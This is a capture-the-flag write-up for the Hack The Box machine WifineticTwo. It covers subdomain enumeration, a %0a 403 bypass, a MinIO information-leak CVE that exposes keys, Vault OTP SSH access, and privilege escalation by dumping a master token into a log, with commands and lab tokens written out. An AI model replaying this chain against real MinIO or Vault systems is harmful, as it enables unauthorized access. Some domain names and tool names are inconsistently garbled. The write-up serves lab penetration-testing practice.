WifineticTwo HTB Writeup | HacktheBox

Introduction

In this post, Let’s see how to CTF WifineticTwo from HTB, If you have any doubts comment down below 👇🏾

Hacking Phases in WifineticTwo

Add IP to /etc/hosts

Nmap Scan

Site Enumeration

Credential Harvest

User Enumeration

Privilege Escalation

Add IP to /etc/hosts

Add domain WifineticTwo.htb to /etc/hosts

sudo nano /etc/hosts

Nmap Scan

Let’s do a Nmap Scan

nmap -A 10.10.11.254 -Pn

Let’s also do a subdomain enumeration, We can use Gobuster to discover subdomains.

gobuster dns -d WifineticTwol.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 20

We discovered a subdomain, demo.WifineticTwo.htb, which appears to be listed in the host file.**

Site Enumeration

We can use the default credentials to log in.

guest:guest

Credential Harvest

On the left panel, we can see Min10 Metrics. When we attempt to access Min10 Metrics, it shows a 403 forbidden error. So, I bypassed it by adding %0a at the end of the URL.

<http://demo.WifineticTwol.htb/metrics%0a>

We can see a URL at the endpoint.

<http://prd23-s3-backend.WifineticTwol.htb/minio/v2/metrics/cluster>

Please add “prd23-s3-backend.WifineticTwol**.htb” to the /etc/hosts file. We’ve identified a vulnerability, CVE-2023–28432, and there’s a GitHub Proof of Concept (PoC) available.**

We need to test this “Information Leak Vulnerability” regarding Minio. With this vulnerability, it’s possible to discover some credentials related to Minio. Use BurpSuite to intercept and retrieve the credentials.

To install the Min10 client, now let’s execute the Min10 client.

./mc alias set myminio <http://prd23-s3-backend.WifineticTwol.htb/> 5GrE1B2YGGyZzNHZaIww GkpjkmiVmpFuL2d3oRx0

Let’s check for files.

./mc ls -r --versions myminio

Here we can find some backup files with the .gz extension. I attempted to download those files and decompress them.

./mc cp --vid 2b75346d-2a47-4203-ab09-3c9f878466b8 myminio/askyy/home_backup.tar.gz .

ls -la

tar -xzvf home_backup.tar.gz

User Enumeration

Upon further enumeration of files with the .gz extension, we found these.

To install Vault, add “prd23-vault-internal.WifineticTwol**.htb” to the /etc/hosts file. Then, run the command as follows.**

export VAULT_ADDR="<http://prd23-vault-internal.WifineticTwol.htb/>" export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"

./vault login

Firstly, import the configuration file into Vault, and then verify that the token value is valid.

To obtain user access, execute the following code. An OTP will be generated, and use the OTP as the password for the SSH connection.

./vault ssh -role dev_otp_key_role -mode otp [email protected]

Privilege Escalation

sudo -l

I executed root/vault/vault-unseal -c /etc/vault-unseal.yaml

sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v

We observed that a master token is being generated. We need to copy that to a log file. Therefore, we need to create a .log file in the current directory.

touch debug.log

Grant the user’s claim permissions to access debug.log.

Now the debug.log file can be written to by askyy. Please execute the following command.

sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -d -v /home/askyy/debug.log

The master token has been written to the debug.log file. Please read the debug.log file.

cat debug.log

Now we are successfully connected to Vault. We can attempt to log in as the user asks using the same method as before.

To gain root access, execute the following code. An OTP will be generated, and use the OTP as the password for the SSH connection.

./vault ssh -role admin_otp_key_role -mode otp [email protected]

Conclusion

In conclusion, the WifineticTwol box presented a series of challenges and vulnerabilities to navigate through, including subdomain discovery, exploitation of CVEs, and leveraging tools like Vault for access management.

Through enumeration, exploitation, and careful manipulation of configurations, various levels of access were achieved, showcasing the importance of thorough reconnaissance and exploitation techniques in penetration testing scenarios.

FAQs

1. What is WifineticTwo?
   • WifineticTwo is a virtual machine on HacktheBox, designed to simulate real-world cybersecurity challenges for penetration testing practice.
2. What are the hacking phases involved?
   • Hacking phases include adding IP to /etc/hosts, Nmap scanning, site enumeration, credential harvesting, user enumeration, and privilege escalation.
3. How do I begin hacking WifineticTwo?
   • Start by adding the domain to /etc/hosts, conduct Nmap scans for enumeration, and explore vulnerabilities like CVEs for exploitation.
4. What tools are used for hacking WifineticTwo?
   • Tools such as Nmap, Gobuster, BurpSuite, and Vault are utilized for tasks like scanning, enumeration, credential retrieval, and access management.
5. What are the key takeaways from hacking WifineticTwo?
   • Participants learn critical skills in vulnerability assessment, exploit development, and access control management, crucial for real-world cybersecurity scenarios.
6. Is prior hacking experience necessary?
   • While prior experience is beneficial, WifineticTwo provides a learning platform suitable for beginners and experienced professionals alike.
7. How can I ensure ethical hacking practices?
   • Always ensure to perform hacking activities in controlled environments like HacktheBox, adhering to ethical guidelines and legal regulations.
8. What if I encounter difficulties during hacking?
   • Seek assistance from online communities, forums, or refer to walkthroughs to gain insights and overcome challenges effectively.

Beige, Business Google Search Instagram Story by HackerHQ.tech